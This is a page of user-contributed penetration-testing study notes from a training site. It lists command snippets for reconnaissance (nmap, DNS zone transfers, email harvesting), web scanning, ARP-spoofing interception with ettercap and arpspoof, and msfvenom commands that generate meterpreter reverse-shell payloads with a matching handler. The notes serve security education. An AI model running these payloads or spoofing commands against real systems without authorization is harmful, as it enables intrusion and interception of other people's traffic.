Advanced Penetration Testing Notes

exploitation

cadaver /usr/share/webshells net local group Administrators    get local admins search xampp metaspolit msfvenom -p php/meterpreter/reverse_tcp LHOST= > name.php use multi/handler set payload php/meterpreter/reverse_tcp set LHOST=   show advan [view]

By: dm41278 | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: September 9, 2016

gathering

whois / nslookup/host/fierce host -t ns ”siteweb”            : connaitre non serveur fierce -dns microsoft.com       [view]

By: ahmadou14 | Related Lesson: Information Gathering (part 2) Domain Name Services | Modified: September 9, 2016

msfvenom

msfvenom is a combination of Msfpayload and Msfencode msfvenom -p windows/meterpreter/reverse_tcp -o   : ”p” specifque le payload / ”o” show option of payload    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1 [view]

By: ahmadou14 | Related Lesson: Metasploit (part 6) msfvenom | Modified: September 9, 2016

ettercap

ettercap -Ti eth0 -M arp:remote /gateway/ /victim/   [view]

By: dm41278 | Related Lesson: Traffic Capture (part 5) ettercap | Modified: September 8, 2016

arp

arpspoof -I eth0 target tell it we are other computer forward traffic /proc/sys/net/ipv4/ip_forward set to 1   [view]

By: dm41278 | Related Lesson: Traffic Capture (part 3) Address Resolution Protocol ARP | Modified: September 8, 2016

nmap

nmap -sS host -oA = all format beginning name nmap -sS <hosts> -p 1-6000     [view]

By: dm41278 | Related Lesson: Information Gathering (part 5) NMAP and PortScanning | Modified: September 8, 2016

email address

theharvester -d <url> -l 500 -b all netcraft.com what’s that site running? maltego graphical tool shodanhq.com       [view]

By: dm41278 | Related Lesson: Information Gathering (part 3) Targeting Email and Maltego | Modified: September 8, 2016

nslookup - host

nslookup set type=mx <url> host -t ns bulbsecurity.com zone transfer host -l bulbsecurity.com <name server> fierce -dns <url>     [view]

By: dm41278 | Related Lesson: Information Gathering (part 2) Domain Name Services | Modified: September 8, 2016

metasploit

/usr/share/metasploit-framework /usr/share/metasploit-framework/modules /usr/share/metasploit-framework/modules/exploits /usr/share/metasploit-framework/modules/exploits/windows/smb/ms08.067.ru exploit-db : search ms08.067.py service postgresql start [view]

By: ahmadou14 | Related Lesson: Metasploit (part 3) Operation | Modified: September 9, 2016

Web Applications

talk to WebDAV cadaver url dirbuster nikto nikto -h <url>   [view]

By: dm41278 | Related Lesson: Vulnerability Scanning (part 5) WebApp, XAMPP, WEBDAV, nikto | Modified: September 8, 2016

« First ‹ Previous 1 115 205 213 214 215 216 217 225 243 Next › Last »

Our Revolution

We believe Cyber Security training should accessible for everyone, everywhere. Everyone deserves the OPPORTUNITY to learn, begin and grow a career in this fascinating field. Therefore, Cybrary is the world's largest community where people, companies and training come together to give everyone the ability to collaborate in an open source way that is revolutionizing the cyber security educational experience.

We recommend always using caution when following any link

Are you sure you want to continue?

Continue
Cancel